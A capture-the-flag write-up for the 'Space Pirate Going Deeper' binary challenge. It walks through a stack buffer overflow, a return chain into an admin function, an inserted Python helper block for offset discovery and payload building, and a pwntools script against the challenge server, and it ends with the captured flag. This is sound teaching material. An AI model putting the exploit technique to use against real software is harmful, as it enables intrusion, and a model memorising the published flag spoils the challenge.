Cyber Apocalypse 2022
Space Pirate Going Deeper
Solved by: Taz34
Here we have a 64-bit binary which takes input as follows:
After playing around with the binary I hit a segmentation fault, which tells us we have a buffer overflow to exploit here.
I found the offset to be 50 bytes.
To understand how the binary works I opened it in Cutter (https://cutter.re/).
There we find the main function and another interesting function named admin_panel. Inside admin_panel we come across an if statement:
From here we can understand that, if we want to print the flag, i.e. reach system("cat flag");, we need to make the if condition false.
So now we can build the payload. The absolute addresses can be hard-coded because the binary is loaded at the fixed 0x400000 base (not position independent), so they are the same locally and on the remote:
payload = b'A'*offset + ret_addr_main + ret_addr_admin_panel + if_arg1 + if_arg2 + if_arg3
payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) + p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)
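The offset above was found by trial and error. As an added example (not the author's script, and not part of the original writeup), the following pure-Python helpers make that step repeatable without pwntools: a cyclic pattern whose 4-byte windows are unique, a function that maps the value observed in the crash back to its position in the input, and a payload builder that packs the chain the way p64 does and refuses bytes that would cut the input short. The 56-byte frame in the demo is a constructed value to exercise the functions, not the challenge's real layout (the writeup found 50); the page's own chain constants are reused so the builder reproduces the payload above.

```python
import string
import struct

# Metasploit-style cyclic pattern: "Aa0Aa1Aa2..." Every 4-byte window is
# unique within the first 26*26*10*3 = 20280 bytes, so whatever chunk of it
# ends up in the saved return address (or in a register) tells us where in
# the input that chunk started.
def pattern_create(length):
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern beyond 20280 bytes is no longer unique")


def p64(value):
    """Pack a 64-bit little-endian integer, like pwntools' p64."""
    return struct.pack("<Q", value)


def find_offset(pattern, crash_value):
    """Map a value read out of the crash (the 8 bytes sitting at RSP after a
    'ret' to a non-canonical address, or an overwritten register) back to
    its position in the pattern. Only the low 4 bytes are matched, so a
    32-bit register value works as well."""
    window = p64(crash_value)[:4]
    pos = pattern.find(window)
    if pos < 0:
        raise ValueError("crash value does not come from the pattern")
    return pos


def build_payload(offset, chain, bad_bytes=b"\n"):
    """Padding up to the saved return address, then each chain value as a
    little-endian QWORD. Refuses bytes that would truncate the input: a
    newline ends any line-oriented read before the rest of the chain lands."""
    payload = b"A" * offset + b"".join(p64(v) for v in chain)
    for b in bad_bytes:
        if b in payload[offset:]:
            raise ValueError(f"chain contains bad byte {b:#04x}")
    return payload


# Constructed demo (hypothetical layout, not the challenge's): pretend the
# saved return address sits 56 bytes into the buffer. Sending the pattern
# makes the program return into pattern[56:64]; a debugger shows that value.
FRAME = 56
PATTERN = pattern_create(200)
OVERWRITTEN_RET = struct.unpack("<Q", PATTERN[FRAME:FRAME + 8])[0]

# The writeup's own chain, reproduced from its constants.
PAGE_CHAIN = [0x400b9a, 0x400b46, 0xdeadbeef, 0x1337c0de, 0x1337beef]


def demo_offset():
    """Recover the padding length from the constructed crash value."""
    return find_offset(PATTERN, OVERWRITTEN_RET)


if __name__ == "__main__":
    print("recovered offset:", demo_offset())
    print("page payload:", build_payload(50, PAGE_CHAIN).hex())
```

In practice the crash value comes from the debugger (e.g. the QWORD at RSP when the program faults on a non-canonical return address) and the recovered position replaces the guessed 50. Null bytes in the packed addresses are fine for a raw read() but would stop strcpy-style copies, so extend bad_bytes to b"\n\x00" if the binary copies the input with a string function.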
With the payload set, the final script is:
from pwn import *

# Local testing (uncomment to run against the binary instead of the remote):
#elf = ELF('./sp_going_deeper')
#p = elf.process()
p = remote("138.68.161.126", 31239)

# 50 bytes of padding up to the saved return address, then the chain.
payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) + p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)

p.sendline(b'1')       # answer the first prompt with 1 (bytes: newer pwntools rejects str)
p.sendline(payload)    # overflow the buffer
p.interactive()        # the flag is printed by system("cat flag")
And here the flag is dumped.
Flag: HTB{no_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_flow_r3d1r3ct}